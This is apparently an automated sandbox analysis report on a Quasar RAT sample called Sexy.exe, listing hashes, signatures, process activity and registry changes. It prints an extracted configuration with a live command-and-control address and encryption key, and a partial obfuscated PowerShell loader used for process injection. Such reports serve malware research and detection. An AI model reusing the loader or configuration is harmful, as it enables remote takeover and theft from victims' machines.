Analysis
-
max time kernel
1800s -
max time network
1592s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
21-04-2024 17:11
Behavioral task
behavioral1
Sample
Sexy.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Sexy.exe
Resource
win10v2004-20240412-en
General
-
Target
Sexy.exe
-
Size
409KB
-
MD5
4c5faec89139e079202a5208d49ed5a0
-
SHA1
f26bf551e191af0dd01b5d39ae0c8489d94a877e
-
SHA256
bbecd1e502693965f493ecb6a611dd86dc71b4bcb8471cf4c459d0b44e9f6378
-
SHA512
5d31a95a76a2d17967f685b47823682f8301164ee9386f267f2ce28b866429dfb48aa7ef7cb21a7ab8b732286fb99eee989d10e5040ea69a361ba83b0b22ec64
-
SSDEEP
12288:iBwz9kOUJIOSQoxdKIT00N2f3DPcCYDVouW5:i+JLOsVRi3YCYg
Malware Config
Extracted
quasar
3.1.5
SLAVE
147.185.221.19:33587
$Sxr-zpFqsQjJJh3miBvVnu
-
encryption_key
LxGS9iJRjIMm1rV0MEzT
-
install_name
BiosUpdX64YDPS.exe
-
log_directory
$sxr
-
reconnect_delay
3000
-
startup_key
$sxr-mtsha
-
subdirectory
Windows
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/4228-0-0x0000000000880000-0x00000000008EC000-memory.dmp family_quasar C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe family_quasar -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
WerFault.exeWerFault.exedescription pid process target process PID 3708 created 3668 3708 WerFault.exe DllHost.exe PID 1084 created 4612 1084 WerFault.exe DllHost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
powershell.EXEpowershell.EXEsvchost.exedescription pid process target process PID 216 created 588 216 powershell.EXE winlogon.exe PID 3180 created 588 3180 powershell.EXE winlogon.exe PID 4356 created 3668 4356 svchost.exe DllHost.exe PID 4356 created 4612 4356 svchost.exe DllHost.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
BiosUpdX64YDPS.exeInstall.exeInstall.exepid process 428 BiosUpdX64YDPS.exe 1488 Install.exe 4348 Install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 5 raw.githubusercontent.com 6 raw.githubusercontent.com 16 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 12 IoCs
Processes:
svchost.exepowershell.EXEsvchost.exesvchost.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\$77svc64 svchost.exe File opened for modification C:\Windows\System32\Tasks\$77BiosUpdX64YDPS.exe svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8A7891822FCFF127E4EADADE9757112B svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 216 set thread context of 2960 216 powershell.EXE dllhost.exe PID 3180 set thread context of 2440 3180 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 8 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
dwm.exedwm.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeSCHTASKS.exeschtasks.exeSCHTASKS.exepid process 3532 schtasks.exe 4708 SCHTASKS.exe 4216 schtasks.exe 208 SCHTASKS.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEOfficeClickToRun.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEdllhost.exepowershell.EXEdllhost.exepid process 216 powershell.EXE 216 powershell.EXE 216 powershell.EXE 216 powershell.EXE 2960 dllhost.exe 2960 dllhost.exe 2960 dllhost.exe 2960 dllhost.exe 2960 dllhost.exe 2960 dllhost.exe 3180 powershell.EXE 2960 dllhost.exe 2960 dllhost.exe 2960 dllhost.exe 2960 dllhost.exe 3180 powershell.EXE 2960 dllhost.exe 2960 dllhost.exe 2960 dllhost.exe 2960 dllhost.exe 3180 powershell.EXE 2960 dllhost.exe 2960 dllhost.exe 2960 dllhost.exe 2960 dllhost.exe 2960 dllhost.exe 2960 dllhost.exe 3180 powershell.EXE 2960 dllhost.exe 2960 dllhost.exe 2960 dllhost.exe 2960 dllhost.exe 2960 dllhost.exe 2960 dllhost.exe 2960 dllhost.exe 2960 dllhost.exe 3180 powershell.EXE 2960 dllhost.exe 2960 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe 2440 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 37 IoCs
Processes:
Sexy.exeBiosUpdX64YDPS.exepowershell.EXEdllhost.exedwm.exedwm.exeExplorer.EXEpowershell.EXEdllhost.exesvchost.exedescription pid process Token: SeDebugPrivilege 4228 Sexy.exe Token: SeDebugPrivilege 428 BiosUpdX64YDPS.exe Token: SeDebugPrivilege 216 powershell.EXE Token: SeDebugPrivilege 216 powershell.EXE Token: SeDebugPrivilege 2960 dllhost.exe Token: SeCreateGlobalPrivilege 2400 dwm.exe Token: SeChangeNotifyPrivilege 2400 dwm.exe Token: 33 2400 dwm.exe Token: SeIncBasePriorityPrivilege 2400 dwm.exe Token: SeCreateGlobalPrivilege 3272 dwm.exe Token: SeChangeNotifyPrivilege 3272 dwm.exe Token: 33 3272 dwm.exe Token: SeIncBasePriorityPrivilege 3272 dwm.exe Token: SeShutdownPrivilege 3368 Explorer.EXE Token: SeCreatePagefilePrivilege 3368 Explorer.EXE Token: SeShutdownPrivilege 3368 Explorer.EXE Token: SeCreatePagefilePrivilege 3368 Explorer.EXE Token: SeDebugPrivilege 3180 powershell.EXE Token: SeDebugPrivilege 3180 powershell.EXE Token: SeDebugPrivilege 2440 dllhost.exe Token: SeShutdownPrivilege 3368 Explorer.EXE Token: SeCreatePagefilePrivilege 3368 Explorer.EXE Token: SeShutdownPrivilege 3368 Explorer.EXE Token: SeCreatePagefilePrivilege 3368 Explorer.EXE Token: SeShutdownPrivilege 3368 Explorer.EXE Token: SeCreatePagefilePrivilege 3368 Explorer.EXE Token: SeAuditPrivilege 2352 svchost.exe Token: SeShutdownPrivilege 3368 Explorer.EXE Token: SeCreatePagefilePrivilege 3368 Explorer.EXE Token: SeAuditPrivilege 2352 svchost.exe Token: SeShutdownPrivilege 3368 Explorer.EXE Token: SeCreatePagefilePrivilege 3368 Explorer.EXE Token: SeShutdownPrivilege 3368 Explorer.EXE Token: SeCreatePagefilePrivilege 3368 Explorer.EXE Token: SeAuditPrivilege 2352 svchost.exe Token: SeShutdownPrivilege 3368 Explorer.EXE Token: SeCreatePagefilePrivilege 3368 Explorer.EXE -
Suspicious use of FindShellTrayWindow 8 IoCs
Processes:
dwm.exedwm.exepid process 2400 dwm.exe 2400 dwm.exe 3272 dwm.exe 3272 dwm.exe 3272 dwm.exe 3272 dwm.exe 3272 dwm.exe 3272 dwm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
BiosUpdX64YDPS.exepid process 428 BiosUpdX64YDPS.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3368 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Sexy.exeBiosUpdX64YDPS.exepowershell.EXEdllhost.exelsass.exedescription pid process target process PID 4228 wrote to memory of 3532 4228 Sexy.exe schtasks.exe PID 4228 wrote to memory of 3532 4228 Sexy.exe schtasks.exe PID 4228 wrote to memory of 3532 4228 Sexy.exe schtasks.exe PID 4228 wrote to memory of 428 4228 Sexy.exe BiosUpdX64YDPS.exe PID 4228 wrote to memory of 428 4228 Sexy.exe BiosUpdX64YDPS.exe PID 4228 wrote to memory of 428 4228 Sexy.exe BiosUpdX64YDPS.exe PID 4228 wrote to memory of 1488 4228 Sexy.exe Install.exe PID 4228 wrote to memory of 1488 4228 Sexy.exe Install.exe PID 4228 wrote to memory of 1488 4228 Sexy.exe Install.exe PID 4228 wrote to memory of 4708 4228 Sexy.exe SCHTASKS.exe PID 4228 wrote to memory of 4708 4228 Sexy.exe SCHTASKS.exe PID 4228 wrote to memory of 4708 4228 Sexy.exe SCHTASKS.exe PID 428 wrote to memory of 4216 428 BiosUpdX64YDPS.exe schtasks.exe PID 428 wrote to memory of 4216 428 BiosUpdX64YDPS.exe schtasks.exe PID 428 wrote to memory of 4216 428 BiosUpdX64YDPS.exe schtasks.exe PID 216 wrote to memory of 2960 216 powershell.EXE dllhost.exe PID 216 wrote to memory of 2960 216 powershell.EXE dllhost.exe PID 216 wrote to memory of 2960 216 powershell.EXE dllhost.exe PID 216 wrote to memory of 2960 216 powershell.EXE dllhost.exe PID 216 wrote to memory of 2960 216 powershell.EXE dllhost.exe PID 216 wrote to memory of 2960 216 powershell.EXE dllhost.exe PID 216 wrote to memory of 2960 216 powershell.EXE dllhost.exe PID 216 wrote to memory of 2960 216 powershell.EXE dllhost.exe PID 2960 wrote to memory of 588 2960 dllhost.exe winlogon.exe PID 2960 wrote to memory of 648 2960 dllhost.exe lsass.exe PID 2960 wrote to memory of 732 2960 dllhost.exe svchost.exe PID 2960 wrote to memory of 916 2960 dllhost.exe svchost.exe PID 2960 wrote to memory of 1000 2960 dllhost.exe dwm.exe PID 2960 wrote to memory of 368 2960 dllhost.exe svchost.exe PID 2960 wrote to memory of 364 2960 dllhost.exe svchost.exe PID 2960 wrote to memory of 696 2960 dllhost.exe svchost.exe PID 428 wrote to memory of 4504 428 BiosUpdX64YDPS.exe schtasks.exe PID 2960 wrote to memory of 1056 2960 dllhost.exe svchost.exe PID 648 wrote to memory of 2600 648 lsass.exe sysmon.exe PID 428 wrote to memory of 4504 428 BiosUpdX64YDPS.exe schtasks.exe PID 428 wrote to memory of 4504 428 BiosUpdX64YDPS.exe schtasks.exe PID 648 wrote to memory of 2600 648 lsass.exe sysmon.exe PID 2960 wrote to memory of 1140 2960 dllhost.exe svchost.exe PID 2960 wrote to memory of 1172 2960 dllhost.exe svchost.exe PID 648 wrote to memory of 2600 648 lsass.exe sysmon.exe PID 428 wrote to memory of 2304 428 BiosUpdX64YDPS.exe cmd.exe PID 428 wrote to memory of 2304 428 BiosUpdX64YDPS.exe cmd.exe PID 428 wrote to memory of 2304 428 BiosUpdX64YDPS.exe cmd.exe PID 648 wrote to memory of 2600 648 lsass.exe sysmon.exe PID 2960 wrote to memory of 1264 2960 dllhost.exe svchost.exe PID 648 wrote to memory of 2600 648 lsass.exe sysmon.exe PID 2960 wrote to memory of 1272 2960 dllhost.exe svchost.exe PID 2960 wrote to memory of 1280 2960 dllhost.exe svchost.exe PID 648 wrote to memory of 2600 648 lsass.exe sysmon.exe PID 2960 wrote to memory of 1368 2960 dllhost.exe svchost.exe PID 2960 wrote to memory of 1420 2960 dllhost.exe svchost.exe PID 2960 wrote to memory of 1444 2960 dllhost.exe svchost.exe PID 648 wrote to memory of 428 648 lsass.exe BiosUpdX64YDPS.exe PID 648 wrote to memory of 428 648 lsass.exe BiosUpdX64YDPS.exe PID 648 wrote to memory of 428 648 lsass.exe BiosUpdX64YDPS.exe PID 648 wrote to memory of 428 648 lsass.exe BiosUpdX64YDPS.exe PID 648 wrote to memory of 428 648 lsass.exe BiosUpdX64YDPS.exe PID 648 wrote to memory of 428 648 lsass.exe BiosUpdX64YDPS.exe PID 648 wrote to memory of 428 648 lsass.exe BiosUpdX64YDPS.exe PID 648 wrote to memory of 428 648 lsass.exe BiosUpdX64YDPS.exe PID 648 wrote to memory of 428 648 lsass.exe BiosUpdX64YDPS.exe PID 648 wrote to memory of 428 648 lsass.exe BiosUpdX64YDPS.exe PID 2960 wrote to memory of 1540 2960 dllhost.exe svchost.exe PID 2960 wrote to memory of 1564 2960 dllhost.exe svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a1d70545-8ee1-43d4-9df5-7e103b974382}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a5599c07-9b1f-4d28-b51e-70ab5e545dc7}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
- Drops file in System32 directory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NscIYjMTeLUC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$VwOuiMtDLFYrFT,[Parameter(Position=1)][Type]$cfBZPGLcHC)$dhqaesgVAPy=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'ef'+'l'+'ec'+[Char](116)+''+'e'+''+'d'+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+'ea'+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'si'+'C'+''+'l'+''+'a'+'ss'+','+''+'A'+''+'u'+''+'t'+'oC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$dhqaesgVAPy.DefineConstructor('R'+[Char](84)+''+[Char](83)+'p'+'e'+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+'m'+''+'e'+''+','+''+'H'+''+[Char](105)+''+'d'+'e'+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$VwOuiMtDLFYrFT).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+'M'+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+'e'+''+'d'+'');$dhqaesgVAPy.DefineMethod('I'+'n'+''+[Char](118)+'o'+'k'+''+[Char](101)+'',''+'P'+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+'B'+''+'y'+''+[Char](83)+'i'+'g'+''+[Char](44)+''+'N'+''+'e'+'wS'+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+'V'+''+[Char](105)+'r'+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$cfBZPGLcHC,$VwOuiMtDLFYrFT).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'me'+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $dhqaesgVAPy.CreateType();}$YqosijnbkXWHS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+'m'+[Char](46)+''+'d'+''+[Char](108)+'l')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+'t'+[Char](46)+'Wi'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+'s'+'a'+''+[Char](102)+'e'+[Char](78)+''+[Char](97)+'ti'+[Char](118)+''+'e'+'M'+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+'d'+[Char](115)+'');$FGSIlmiIpqBvvy=$YqosijnbkXWHS.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+'o'+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+'a'+[Char](116)+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object 